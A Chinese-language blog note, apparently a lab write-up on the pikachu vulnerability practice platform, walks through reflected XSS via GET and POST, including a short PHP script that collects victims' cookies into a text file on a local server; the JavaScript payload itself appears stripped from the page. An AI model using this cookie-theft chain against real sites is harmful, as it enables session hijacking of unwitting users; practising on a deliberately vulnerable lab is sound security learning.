pikachu漏洞练习平台使用笔记-XSS(反射型XSS)

 反射型XSS get方式

在表单里直接输入xss语句,会发现限制字符长度,我们可以审查元素,把长度20改大一点,就恶意输入更多字符了,但是每次刷新后还会重新变为20,所以还是直接在网址框里输入吧

pikachu漏洞练习平台使用笔记-XSS(反射型XSS)_第1张图片

 我们输入一个简单的XSS语句

发现可以解析,即存在XSS漏洞

pikachu漏洞练习平台使用笔记-XSS(反射型XSS)_第2张图片

接下来,我们简单利用一下这个反射型XSS漏洞,来获取用户cookie

我们需要一个接收cookie的服务器(127.0.0.1:80),来接收受害主机的cookie

下面是一个接收代码(getcookie.php),把接收的cookie存到cookie.txt文件

$cookie=$_GET['cookie'];
$fp = fopen("cookie.txt","a");
fwrite($fp," Cookie:".$cookie."/n");
?>

 接下来就构造一个xss攻击的js代码

 

 但是我不清楚为什么直接在加在url中不行,没有反应,所以绕了个弯,把这个js代码写在js文件了,然后再调用这个文件,就可以成功了

http://127.0.0.1:8888/vul/xss/xss_reflected_get.php?message=&submit=submit

pikachu漏洞练习平台使用笔记-XSS(反射型XSS)_第3张图片

在新打开的窗口中可以看到已经获取了cookie 

 在txt文件中也可以看到已经存储了cookie值

pikachu漏洞练习平台使用笔记-XSS(反射型XSS)_第4张图片

 反射型XSS post方式

实际上这个跟get方式区别不大无非是换了一个提交方式

我们登陆,然后在输入框里输入XSS代码,依然可以利用。

pikachu漏洞练习平台使用笔记-XSS(反射型XSS)_第5张图片

 

你可能感兴趣的:(pikachu漏洞练习平台使用笔记-XSS(反射型XSS))